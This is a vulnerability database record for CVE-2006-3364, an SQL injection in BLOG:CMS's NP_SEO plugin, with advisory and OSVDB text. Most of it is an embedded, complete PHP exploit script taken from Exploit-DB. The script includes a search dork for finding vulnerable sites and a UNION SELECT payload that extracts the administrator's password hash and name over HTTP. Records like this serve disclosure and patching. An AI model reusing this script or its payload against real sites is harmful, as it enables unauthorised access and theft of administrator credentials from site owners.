ID CVE-2006-3364 Type cve Reporter cve@mitre.org Modified 2018-10-18T16:47:00
Description
SQL injection vulnerability in index.php in the NP_SEO plugin in BLOG:CMS before 4.1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Upgrade to BLOG:CMS version 4.1.0 :
http://sourceforge.net/project/showfiles.php?group_id=111880
{"exploitdb": [{"lastseen": "2016-01-31T15:14:09", "description": "BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit. CVE-2006-3364. Webapps exploit for php platform", "published": "2006-06-28T00:00:00", "type": "exploitdb", "title": "BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3364"], "modified": "2006-06-28T00:00:00", "id": "EDB-ID:1960", "href": "https://www.exploit-db.com/exploits/1960/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\necho \"BLOG:CMS <= 4.0.0k sql injection/admin credentials disclosure exploit\\n\";\necho \"by rgod rgod@autistici.org\\n\";\necho \"site: http://retrogod.altervista.org\\n\";\necho \"dork: \\\"Powered by BLOG:CMS\\\"|\\\"Powered by blogcms.com\\\"|\\\"2003-2004, Radek Hul\u0e23\u0e01n\\\"\\n\\n\";\n\nif ($argc<3) {\necho \"Usage: php \".$argv[0].\" host path OPTIONS\\n\";\necho \"host: target server (ip/hostname)\\n\";\necho \"path: path to BLOG:CMS\\n\";\necho \"Options:\\n\";\necho \" -p[port]: specify a port other than 80\\n\";\necho \" -P[ip:port]: specify a proxy\\n\";\necho \" -T[prefix]: specify a table prefix (default: none)\\n\";\necho \"Example:\\n\";\necho \"php \".$argv[0].\" localhost /blog/\\n\";\ndie;\n}\n/* software site: http://blogcms.com/\n\n i) vulnerable code in index.php, lines 19-36:\n\n ...\n// NP_SEO plugin redirect\nif (isset($_GET['id'])){\n $query=sql_query(\"select url from \".sql_table(\"plug_seo\").\" where id='\".undoMagic($_GET['id']).\"'\");\n if ($row=sql_fetch_object($query)) {\n $row->url=stripslashes($row->url);\n $redirect=true;\n if (strpos($row->url,'|noseo|')!==false) {\n $arr=explode(\",\",'msnbot,googlebot,crawler,centrum');\n foreach ($arr as $s) if (strstr($_SERVER[\"HTTP_USER_AGENT\"],$s)) $redirect=false;\n $arr=explode(\",\",'downloader.seznam,inktomi,yahoo,altavista,fasttrack,excite,hotbot,alltheweb,yahoo');\n $dns = strtolower(@gethostbyaddr($_SERVER[\"REMOTE_ADDR\"]));\n foreach ($arr as $s) if (strstr($dns,$s)) $redirect=false;\n $row->url=str_replace('|noseo|','',$row->url);\n }\n if ($redirect) header('Location: '.unhtmlentities($row->url));\n }\n unset($query);\n}\n ...\n\n \"id\" argument is not sanitized before to be used in a sql query...\n also you can inject sql statements regardless of magic_quotes_gpc settings,\n look at undoMagic() function in vars4.1.0.php:\n\n // removes magic quotes if that option is enabled\n function undoMagic($data) {\n\treturn get_magic_quotes_gpc() ? stripslashes($data) : $data;\n }\n\n very nice code :)\n \t\t\t\t\t\t\t\t */\n\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n #debug\n #echo \"\\r\\n\".$html;\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$port=80;\n$proxy=\"\";\n$prefix=\"\";\nfor ($i=3; $i<=$argc-1; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\nif ($temp==\"-T\")\n{\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\n}\n}\n\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\n$sql=\"9999999'/**/UNION/**/SELECT/**/mpassword/**/FROM/**/\".$prefix.\"nucleus_member/**/WHERE/**/mnumber=1/*\"; //id = 2, admin\n$sql=urlencode($sql);\n$packet =\"GET \".$p.\"?id=$sql HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n$temp=explode(\"Location: \",$html);\n$temp2=explode(\"\\n\",$temp[1]);\n$temp2[0]=trim($temp2[0]);\nif (($temp2[0]<>\"\") and (!strstr($temp2[0],\"http\")) and (!strstr($temp2[0],\"UNION\")))\n{\n if (strlen($temp2[0])==40) {$type=\"sha1\";}\n if (strlen($temp2[0])==32) {$type=\"md5\";}\n echo \"exploit succeded...\\n\";\n echo \"password (\".$type.\")-> \".$temp2[0].\"\\n\";\n $sql=\"9999999'/**/UNION/**/SELECT/**/mrealname/**/FROM/**/\".$prefix.\"nucleus_member/**/WHERE mnumber=1/*\";\n $sql=urlencode($sql);\n $packet =\"GET \".$p.\"?id=$sql HTTP/1.0\\r\\n\";\n $packet.=\"Host: \".$host.\"\\r\\n\";\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\n sendpacketii($packet);\n $temp=explode(\"Location: \",$html);\n $temp2=explode(\"\\n\",$temp[1]);\n echo \"admin -> \".$temp2[0].\"\\n\";\n}\nelse\n{\n//debug\necho $html.\"\\r\\n\";\necho \"exploit failed... see html\\n\";\n}\n?>\n\n# milw0rm.com [2006-06-28]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1960/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3364"], "edition": 1, "description": "## Vulnerability Description\nBlog:Cms contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 4.1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nBlog:Cms contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\nSecurity Tracker: 1016408\n[Secunia Advisory ID:20859](https://secuniaresearch.flexerasoftware.com/advisories/20859/)\nOther Advisory URL: http://retrogod.altervista.org/blogcms_400k_sql.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0597.html\nFrSIRT Advisory: ADV-2006-2582\n[CVE-2006-3364](https://vulners.com/cve/CVE-2006-3364)\n", "modified": "2006-06-28T04:42:19", "published": "2006-06-28T04:42:19", "href": "https://vulners.com/osvdb/OSVDB:26877", "id": "OSVDB:26877", "type": "osvdb", "title": "BLOG:CMS index.php id Variable SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
